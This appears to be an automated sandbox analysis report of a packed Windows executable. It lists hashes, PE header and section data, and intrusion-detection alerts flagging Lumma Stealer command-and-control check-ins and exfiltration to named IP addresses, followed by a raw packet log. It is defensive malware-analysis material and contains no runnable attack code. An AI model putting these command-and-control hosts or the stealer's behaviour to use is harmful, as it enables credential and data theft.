                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):7.947548723877745
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                            File size:1'910'784 bytes
                                                                                                                                                                                            MD5:1f9e0235a6c12bd12d8220185fad9d04
                                                                                                                                                                                            SHA1:9673c5a73b0a5823adabd6e5e831415e49cc2139
                                                                                                                                                                                            SHA256:c0ab2ce327eb8e97036ac5bd876658cb5b7016dab1d8dd1aced2786f66941d40
                                                                                                                                                                                            SHA512:994ace0797d971d40dae481053c7058647a73449c7916c2fb5772b14734bd803e2654598fa6d097b9fa1d0bbec68ddabdf4d3d3f0cc2b97d0721f4fc77229fd2
                                                                                                                                                                                            SSDEEP:49152:D5IM/f1L82SQpQJ/i0ncdteLdhh6pWjJvvoED+Z:D//fZnwKycdtOr6pCHoEK
                                                                                                                                                                                            TLSH:549533C351A3D868CB4919BAB672CF69FF3073BF44942810F2079C0E45BA26F5772699
                                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g.............................@K...........@..........................pK...........@.................................\p..p..
                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                            Entrypoint:0x8b4000
                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                            Instruction
                                                                                                                                                                                            jmp 00007F5E69349D2Ah
                                                                                                                                                                                            clts
                                                                                                                                                                                            sbb eax, 00000000h
                                                                                                                                                                                            add cl, ch
                                                                                                                                                                                            add byte ptr [eax], ah
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x2b0.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            0x10000x550000x25e0054dce3da185bda51b3dd0a3fd6409212False0.9974409550330033data7.9788040996126055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .rsrc0x560000x2b00x200e6114542279b56a9d6e21bc1d4b4dcfeFalse0.796875data6.041464513660007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            0x580000x2b20000x20082bb432c55cfa34c16cdaa6a62935b7cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            akxghhwi0x30a0000x1a90000x1a8e00c38e4e25d027de6d78df107538b1c988False0.994061902397764data7.953902225631802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            yjeyyxpl0x4b30000x10000x400a4d144ffd9ed4501b91a205906afc87aFalse0.8310546875data6.326945278456268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .taggant0x4b40000x30000x2200f0b6a0b37aa16fa8f90daa5b9c2cf7bfFalse0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                            RT_MANIFEST0x4b29f40x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                            2024-11-20T21:04:03.986111+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:04.692509+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:04.692509+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:05.998932+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:06.708558+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:06.708558+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:08.362682+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:10.836396+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:13.498944+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:16.181341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:16.971858+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:18.903549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:25.387127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:26.139635+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742104.21.66.38443TCP
                                                                                                                                                                                            2024-11-20T21:04:27.674813+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449744185.215.113.1680TCP
                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Nov 20, 2024 21:04:02.701817036 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:02.701864958 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:02.702152014 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:02.705766916 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:02.705807924 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:02.987838984 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                            Nov 20, 2024 21:04:03.985904932 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:03.986110926 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:03.991365910 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:03.991394997 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:03.991806984 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.034810066 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.060345888 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.060345888 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.060553074 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.692584038 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.692859888 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.693044901 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.709084034 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.709084988 CET49730443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.709134102 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.709161997 CET44349730104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.773243904 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.773283005 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:04.773372889 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.774655104 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:04.774672031 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:05.998852968 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:05.998931885 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.002269983 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.002289057 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.002684116 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.006397009 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.006441116 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.006505013 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.708594084 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.708739996 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.708836079 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.708868027 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.709335089 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.709392071 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.709403038 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.709491014 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.709544897 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.709552050 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.724598885 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.724688053 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.724697113 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.733122110 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.733277082 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.733285904 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.784847975 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.828195095 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.878449917 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.878473043 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.900614023 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.900698900 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.900718927 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.900887012 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.900958061 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.901055098 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.901067019 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:06.901092052 CET49731443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:06.901097059 CET44349731104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:07.036168098 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:07.036205053 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:07.036299944 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:07.036711931 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:07.036730051 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:08.362577915 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:08.362682104 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:08.369256020 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:08.369268894 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:08.370196104 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:08.372879028 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:08.373174906 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:08.373270988 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:08.373331070 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:08.373339891 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:09.403584957 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:09.403717995 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:09.403829098 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:09.404122114 CET49732443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:09.404145002 CET44349732104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:09.565203905 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:09.565335035 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:09.565468073 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:09.566026926 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:09.566077948 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:10.836139917 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:10.836395979 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:10.884022951 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:10.884068966 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:10.884588957 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:10.893403053 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:10.893455982 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:10.893538952 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:11.800606966 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:11.800729990 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:11.800863028 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:11.801235914 CET49733443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:11.801271915 CET44349733104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:12.280345917 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:12.280391932 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:12.280473948 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:12.280782938 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:12.280792952 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:13.498631954 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:13.498944044 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:13.500762939 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:13.500776052 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:13.501300097 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:13.503114939 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:13.503266096 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:13.503304005 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:13.503391027 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:13.503397942 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:14.350296021 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:14.350435972 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:14.350523949 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:14.350744963 CET49734443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:14.350774050 CET44349734104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:14.879200935 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:14.879287958 CET44349735104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:14.879420042 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:14.879968882 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:14.879987955 CET44349735104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:16.181236982 CET44349735104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:16.181340933 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:16.183187962 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:16.183204889 CET44349735104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:16.183545113 CET44349735104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:16.185836077 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:16.186242104 CET49735443192.168.2.4104.21.66.38
                                                                                                                                                                                            Nov 20, 2024 21:04:16.186249971 CET44349735104.21.66.38192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:16.488502979 CET49736443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:16.488634109 CET44349736172.202.163.200192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:16.488751888 CET49736443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:16.498707056 CET49736443192.168.2.4172.202.163.200
                                                                                                                                                                                            Nov 20, 2024 21:04:16.498745918 CET44349736172.202.163.200192.168.2.4
